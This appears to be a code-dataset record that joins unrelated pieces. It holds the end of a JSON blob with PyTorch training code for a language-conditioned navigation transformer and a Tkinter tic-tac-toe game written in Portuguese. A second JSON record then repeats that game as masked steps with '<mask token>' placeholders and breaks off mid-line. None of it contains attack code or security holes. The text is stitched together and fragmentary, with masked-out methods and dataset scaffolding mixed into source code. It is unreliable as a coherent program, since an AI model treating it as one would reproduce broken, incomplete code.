[]\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {} \n for k in batch.keys():\n small_batch[k] = batch[k][i:i+self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f\"Validating epoch {epoch} step {step}...\") \n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0 \n self.encoder.eval() \n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\"dev\", validation_limit)): \n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0) \n total_next_acc += score_dict['next_f1']\n total += 1\n\n mean_next_acc = total_next_acc / total \n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0 \n total = 0 \n total_block_acc = 0.0 \n self.encoder.eval() \n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.read(\"dev\", self.validation_limit))): \n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.debug_image_top_k, self.debug_image_threshold) \n total_acc += score_dict['next_f1']\n total += 1\n\n mean_acc = total_acc / total \n print(f\"Test-time pixel acc {mean_acc * 100}\") \n return mean_acc \n\n def train_and_validate_one_epoch(self, epoch): \n print(f\"Training epoch {epoch}...\") \n self.encoder.train() \n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read(\"train\")): \n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad() \n outputs = self.encoder(small_batch) \n # skip bad examples \n if outputs is None:\n skipped += 1\n continue\n\n loss = self.compute_patch_loss(small_batch, outputs, self.next_to_prev_weight) \n loss.backward() \n self.optimizer.step() \n it = (epoch + 1) * (step+1) \n self.scheduler.step_batch(it) \n #print(f\"step: {step+1} checkpoint_every: {self.checkpoint_every} {(step +1) % self.checkpoint_every}\")\n if (step+1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.validation_limit)\n print(f\"Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}\")\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n\n self.save_model(f\"{epoch}_{step}\", is_best) \n\n step += 1\n print(f\"skipped {skipped} examples\") \n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.validation_limit) \n print(f\"Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}\") \n if self.score_type == \"acc\":\n return (epoch_acc)/2, -1.0\n else:\n raise AssertionError(f\"invalid score type {self.score_type}\")\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight = [1.0, 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape \n\n pred_next_image = outputs[\"next_position\"]\n\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float() \n true_next_image = image_to_tiles(path_state, self.patch_size) \n\n # binarize patches\n next_sum_image = torch.sum(true_next_image, dim = 2, keepdim=True) \n next_patches = torch.zeros_like(next_sum_image)\n # any patch that has a 1 pixel in it gets 1 \n next_patches[next_sum_image != 0] = 1\n\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long() \n\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image, next_patches) \n\n total_loss = next_pixel_loss \n print(f\"loss {total_loss.item()}\")\n\n return total_loss\n\n def generate_debugging_image(self, \n true_img, \n path_state, \n pred_path, \n out_path, \n caption = None,\n top_k = None,\n threshold = None): \n caption = self.wrap_caption(caption)\n\n fig, ax = plt.subplots(2,2, figsize=(16,16))\n\n # gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1])\n text_ax = ax[0,1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize = 12)\n text_ax.axis(\"off\") \n\n props = dict(boxstyle='round', \n facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n # img_ax = plt.subplot(gs[2])\n img_ax = ax[1,0]\n #w = int(40 * (self.resolution / 224))\n true_img = true_img.detach().cpu().numpy().astype(float)[:,:,0:3]\n img_ax.imshow(true_img)\n\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1,1,3)).astype(float)\n\n true_ax = ax[0,0]\n true_ax.imshow(true_path)\n\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1,:,:]\n\n\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape = (512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path<1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path \n\n\n pred_path = np.tile(pred_path, (1,1,3)).astype(float)\n\n pred_ax = ax[1,1]\n pred_ax.imshow(pred_path)\n\n file_path = f\"{out_path}.png\"\n print(f\"saving to {file_path}\") \n plt.savefig(file_path) \n plt.close() \n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num, top_k, threshold): \n self.encoder.eval() \n outputs = self.encoder(batch_instance) \n next_position = outputs['next_position']\n\n next_position = tiles_to_image(next_position, self.patch_size, output_type=\"per-patch\", upsample=True) \n # f1 metric \n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\"path_state\"].unsqueeze(-1), next_position) \n\n if epoch_num > self.generate_after_n: \n for i in range(outputs[\"next_position\"].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f\"batch_{batch_num}\").joinpath(f\"instance_{i}\")\n output_path.mkdir(parents = True, exist_ok=True)\n command = batch_instance[\"command\"][i]\n command = [x for x in command if x != \"<PAD>\"]\n command = \" \".join(command) \n image = batch_instance['input_image'][i]\n path_state = batch_instance[\"path_state\"][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image,\n path_state,\n pred_path,\n output_path,\n caption = command,\n top_k = top_k,\n threshold = threshold)\n\n return {\"next_f1\": next_f1} \n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-8\n values, pred_pixels = torch.max(pred_pos, dim=1) \n gold_pixels = true_pos \n pred_pixels = pred_pixels.unsqueeze(1) \n\n pred_pixels = pred_pixels.detach().cpu().float() \n gold_pixels = gold_pixels.detach().cpu().float() \n\n total_pixels = sum(pred_pixels.shape) \n\n true_pos = torch.sum(pred_pixels * gold_pixels).item() \n true_neg = torch.sum((1-pred_pixels) * (1 - gold_pixels)).item() \n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item() \n false_neg = torch.sum((1-pred_pixels) * gold_pixels).item() \n precision = true_pos / (true_pos + false_pos + eps) \n recall = true_pos / (true_pos + false_neg + eps) \n f1 = 2 * (precision * recall) / (precision + recall + eps) \n return precision, recall, f1\n\ndef main(args):\n device = \"cpu\"\n if args.cuda is not None:\n free_gpu_id = get_free_gpu()\n if free_gpu_id > -1:\n device = f\"cuda:{free_gpu_id}\"\n #device = \"cuda:0\"\n\n device = torch.device(device) \n print(f\"On device {device}\") \n #test = torch.ones((1))\n #test = test.to(device) \n\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n\n dataset_reader = NavigationDatasetReader(dir = args.data_dir,\n out_path = args.out_path,\n path_width = args.path_width,\n read_limit = args.read_limit, \n batch_size = args.batch_size, \n max_len = args.max_len,\n tokenizer = tokenizer,\n shuffle = args.shuffle,\n overfit = args.overfit, \n is_bert = \"bert\" in args.embedder) \n\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir() \n\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath(\"vocab.json\")) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath(\"vocab.json\"), \"w\") as f1:\n json.dump(list(train_vocab), f1) \n else:\n print(f\"Reading vocab from {checkpoint_dir}\") \n with open(checkpoint_dir.joinpath(\"vocab.json\")) as f1:\n train_vocab = json.load(f1) \n\n print(f\"got data\") \n\n # construct the vocab and tokenizer \n print(f\"constructing model...\") \n # get the embedder from args \n if args.embedder == \"random\":\n embedder = RandomEmbedder(tokenizer, train_vocab, args.embedding_dim, trainable=True)\n elif args.embedder == \"glove\":\n embedder = GloveEmbedder(tokenizer, train_vocab, args.embedding_file, args.embedding_dim, trainable=True) \n elif args.embedder.startswith(\"bert\"): \n embedder = BERTEmbedder(model_name = args.embedder, max_seq_len = args.max_len) \n else:\n raise NotImplementedError(f\"No embedder {args.embedder}\") \n\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n \n encoder_kwargs = dict(image_size = args.resolution,\n patch_size = args.patch_size, \n language_embedder = embedder, \n n_layers = args.n_layers,\n channels = args.channels,\n n_heads = args.n_heads,\n hidden_dim = args.hidden_dim,\n ff_dim = args.ff_dim,\n dropout = args.dropout,\n embed_dropout = args.embed_dropout,\n output_type = args.output_type, \n positional_encoding_type = args.pos_encoding_type,\n device = device,\n log_weights = args.test,\n locality_mask = args.locality_mask,\n locality_neighborhood = args.locality_neighborhood,\n init_scale = args.init_scale) \n\n # Initialize encoder \n encoder = encoder_cls(**encoder_kwargs)\n\n if args.cuda is not None:\n encoder = encoder.cuda(device) \n print(encoder) \n # construct optimizer \n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate) \n # scheduler\n scheduler = NoamLR(optimizer, model_size = args.hidden_dim, warmup_steps = args.warmup, factor = args.lr_factor) \n\n best_epoch = -1\n block_size = int((args.resolution * 4)/64) \n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n # file exists\n try:\n assert(len(glob.glob(os.path.join(args.checkpoint_dir, \"*.th\"))) == 0)\n except AssertionError:\n raise AssertionError(f\"Output directory {args.checkpoint_dir} non-empty, will not overwrite!\") \n else:\n # resume from pre-trained \n encoder = encoder.to(\"cpu\") \n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\"best.th\"), map_location='cpu')\n \n encoder.load_state_dict(state_dict, strict=True) \n encoder = encoder.cuda(device) \n # get training info \n best_checkpoint_data = json.load(open(pathlib.Path(args.checkpoint_dir).joinpath(\"best_training_state.json\")))\n print(f\"best_checkpoint_data {best_checkpoint_data}\") \n best_epoch = best_checkpoint_data[\"epoch\"]\n\n # save arg config to checkpoint_dir\n with open(pathlib.Path(args.checkpoint_dir).joinpath(\"config.yaml\"), \"w\") as f1:\n dump_args = copy.deepcopy(args) \n # drop stuff we can't serialize \n del(dump_args.__dict__[\"cfg\"]) \n del(dump_args.__dict__[\"__cwd__\"]) \n del(dump_args.__dict__[\"__path__\"]) \n to_dump = dump_args.__dict__\n # dump \n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True) \n\n else:\n # test-time, load best model \n print(f\"loading model weights from {args.checkpoint_dir}\") \n #state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\"best.th\"))\n #encoder.load_state_dict(state_dict, strict=True) \n encoder = encoder.to(\"cpu\") \n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\"best.th\"), map_location='cpu')\n \n encoder.load_state_dict(state_dict, strict=True) \n encoder = encoder.cuda(device) \n\n num_blocks = 1\n # construct trainer \n trainer = NavigationTransformerTrainer(dataset_reader = dataset_reader,\n encoder = encoder,\n optimizer = optimizer, \n scheduler = scheduler, \n num_epochs = args.num_epochs,\n num_blocks = num_blocks,\n device = device,\n checkpoint_dir = args.checkpoint_dir,\n checkpoint_every = args.checkpoint_every, \n validation_limit = args.validation_limit, \n num_models_to_keep = args.num_models_to_keep,\n generate_after_n = args.generate_after_n, \n score_type=args.score_type,\n depth = depth, \n resolution = args.resolution, \n output_type = args.output_type, \n patch_size = args.patch_size,\n block_size = block_size, \n best_epoch = best_epoch,\n seed = args.seed,\n zero_weight = args.zero_weight,\n debug_image_top_k = args.debug_image_top_k,\n debug_image_threshold = args.debug_image_threshold) \n\n if not args.test:\n trainer.train() \n else:\n print(f\"evaluating\") \n acc = trainer.evaluate()\n print(f\"accuracy: {acc}\")\n\n\nif __name__ == \"__main__\":\n np.random.seed(12)\n torch.manual_seed(12)\n\n parser = configure_parser()\n args = parser.parse_args() \n\n main(args) \n\n",
"step-ids": [
10,
11,
12,
13,
15
]
}
|
[
10,
11,
12,
13,
15
] |
import tkinter as tk
import classejogo
class Tabuleiro():
def __init__(self):
self.jogo = classejogo.Jogo()
self.window = tk.Tk()
self.window.title("Jogo da Velha")
self.window.geometry("300x360+100+100")
self.window.rowconfigure(0, minsize=30, weight=1)
self.window.rowconfigure(1, minsize=100, weight=1)
self.window.rowconfigure(2, minsize=100, weight=1)
self.window.rowconfigure(3, minsize=100, weight=1)
self.window.rowconfigure(4, minsize=30, weight=1)
self.window.columnconfigure(0, minsize=100, weight=1)
self.window.columnconfigure(1, minsize=100, weight=1)
self.window.columnconfigure(2, minsize=100, weight=1)
self.window.columnconfigure(3, minsize=100, weight=1)
#Criando os Botões:
self.vitorias_X = tk.Label(self.window)
self.vitorias_X.grid(row=0, column=0, sticky="nsew")
self.vitorias_X.configure(text="Vitórias de X: {0} ".format(self.jogo.vitórias_x),font='Arial 10', bg='Blue', fg='White')
self.placar = tk.Label(self.window)
self.placar.grid(row=0, column=1, sticky="nsew")
self.placar.configure(text= "<- PLACAR ->",font='Arial 10', bg='Black', fg='Green')
self.vitorias_O = tk.Label(self.window)
self.vitorias_O.grid(row=0, column=2, sticky="nsew")
self.vitorias_O.configure(text="Vitórias de O: {0} ".format(self.jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')
self.botão0x0 = tk.Button(self.window)
self.botão0x0.grid(row=1, column=0, sticky="nsew")
self.botão0x0.configure(command=self.botão0x0_clicado)
self.botão0x1 = tk.Button(self.window)
self.botão0x1.grid(row=1, column=1, sticky="nsew")
self.botão0x1.configure(command=self.botão0x1_clicado)
self.botão0x2 = tk.Button(self.window)
self.botão0x2.grid(row=1, column=2, sticky="nsew")
self.botão0x2.configure(command=self.botão0x2_clicado)
self.botão1x0 = tk.Button(self.window)
self.botão1x0.grid(row=2, column=0, sticky="nsew")
self.botão1x0.configure(command=self.botão1x0_clicado)
self.botão1x1 = tk.Button(self.window)
self.botão1x1.grid(row=2, column=1, sticky="nsew")
self.botão1x1.configure(command=self.botão1x1_clicado)
self.botão1x2 = tk.Button(self.window)
self.botão1x2.grid(row=2, column=2, sticky="nsew")
self.botão1x2.configure(command=self.botão1x2_clicado)
self.botão2x0 = tk.Button(self.window)
self.botão2x0.grid(row=3, column=0, sticky="nsew")
self.botão2x0.configure(command=self.botão2x0_clicado)
self.botão2x1 = tk.Button(self.window)
self.botão2x1.grid(row=3, column=1, sticky="nsew")
self.botão2x1.configure(command=self.botão2x1_clicado)
self.botão2x2 = tk.Button(self.window)
self.botão2x2.grid(row=3, column=2, sticky="nsew")
self.botão2x2.configure(command=self.botão2x2_clicado)
#Criando a Label dos turnos:
self.label_turno = tk.Label(self.window)
self.label_turno.grid(row=4, column=0, columnspan=1, sticky="nsew")
self.label_turno.configure(text="Turno de : {0}" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)
#Criando Botão de Reiniciar:
self.reiniciar = tk.Button(self.window)
self.reiniciar.grid(row=4, column=1,columnspan=1, sticky="nsew")
self.reiniciar.configure(text="Reiniciar", font='Arial 18', activeforeground='Green', fg='Red', command=self.restart)
self.label_ganhador = tk.Label(self.window)
self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky="nsew")
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
###############################################################################
def clicou(self, i, j):
print("Turno de: {0} " .format(self.jogo.player))
print("Botão {0} x {1} clicado" .format(i,j))
###############################################################################
def botão0x0_clicado(self):
self.clicou(0,0)
self.botão0x0.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(0,0)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão0x1_clicado(self):
self.clicou(0,1)
self.botão0x1.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(0,1)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão0x2_clicado(self):
self.clicou(0,2)
self.botão0x2.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(0,2)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão1x0_clicado(self):
self.clicou(1,0)
self.botão1x0.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(1,0)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão1x1_clicado(self):
self.clicou(1,1)
self.botão1x1.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(1,1)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão1x2_clicado(self):
self.clicou(1,2)
self.botão1x2.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(1,2)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão2x0_clicado(self):
self.clicou(2,0)
self.botão2x0.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(2,0)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão2x1_clicado(self):
self.clicou(2,1)
self.botão2x1.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(2,1)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão2x2_clicado(self):
self.clicou(2,2)
self.botão2x2.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(2,2)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def iniciar(self):
self.window.mainloop()
###############################################################################
def restart(self):
self.jogo.limpa_jogadas()
self.botão0x0 = tk.Button(self.window)
self.botão0x0.grid(row=1, column=0, sticky="nsew")
self.botão0x0.configure(command=self.botão0x0_clicado)
self.botão0x1 = tk.Button(self.window)
self.botão0x1.grid(row=1, column=1, sticky="nsew")
self.botão0x1.configure(command=self.botão0x1_clicado)
self.botão0x2 = tk.Button(self.window)
self.botão0x2.grid(row=1, column=2, sticky="nsew")
self.botão0x2.configure(command=self.botão0x2_clicado)
self.botão1x0 = tk.Button(self.window)
self.botão1x0.grid(row=2, column=0, sticky="nsew")
self.botão1x0.configure(command=self.botão1x0_clicado)
self.botão1x1 = tk.Button(self.window)
self.botão1x1.grid(row=2, column=1, sticky="nsew")
self.botão1x1.configure(command=self.botão1x1_clicado)
self.botão1x2 = tk.Button(self.window)
self.botão1x2.grid(row=2, column=2, sticky="nsew")
self.botão1x2.configure(command=self.botão1x2_clicado)
self.botão2x0 = tk.Button(self.window)
self.botão2x0.grid(row=3, column=0, sticky="nsew")
self.botão2x0.configure(command=self.botão2x0_clicado)
self.botão2x1 = tk.Button(self.window)
self.botão2x1.grid(row=3, column=1, sticky="nsew")
self.botão2x1.configure(command=self.botão2x1_clicado)
self.botão2x2 = tk.Button(self.window)
self.botão2x2.grid(row=3, column=2, sticky="nsew")
self.botão2x2.configure(command=self.botão2x2_clicado)
#Criando a Label dos turnos:
self.label_turno = tk.Label(self.window)
self.label_turno.grid(row=4, column=0, columnspan=1, sticky="nsew")
self.label_turno.configure(text="Turno de : {0}" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)
#Criando Botão de Reiniciar:
self.reiniciar = tk.Button(self.window)
self.reiniciar.grid(row=4, column=1,columnspan=1, sticky="nsew")
self.reiniciar.configure(text="Reiniciar", font='Arial 24', activeforeground='Green', fg='Red', command=self.restart)
self.label_ganhador = tk.Label(self.window)
self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky="nsew")
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
self.vitorias_X.configure(text="Vitórias de X: {0} ".format(self.jogo.vitórias_x), bg='Blue', fg='White')
self.vitorias_O.configure(text="Vitórias de O: {0} ".format(self.jogo.vitórias_o), bg='Yellow', fg='Black')
###############################################################################
jogodavelha = Tabuleiro()
jogodavelha.iniciar()
|
normal
|
{
"blob_id": "9cff227eeeaffda777668aa3b90e3839426da811",
"index": 6683,
"step-1": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n <mask token>\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n 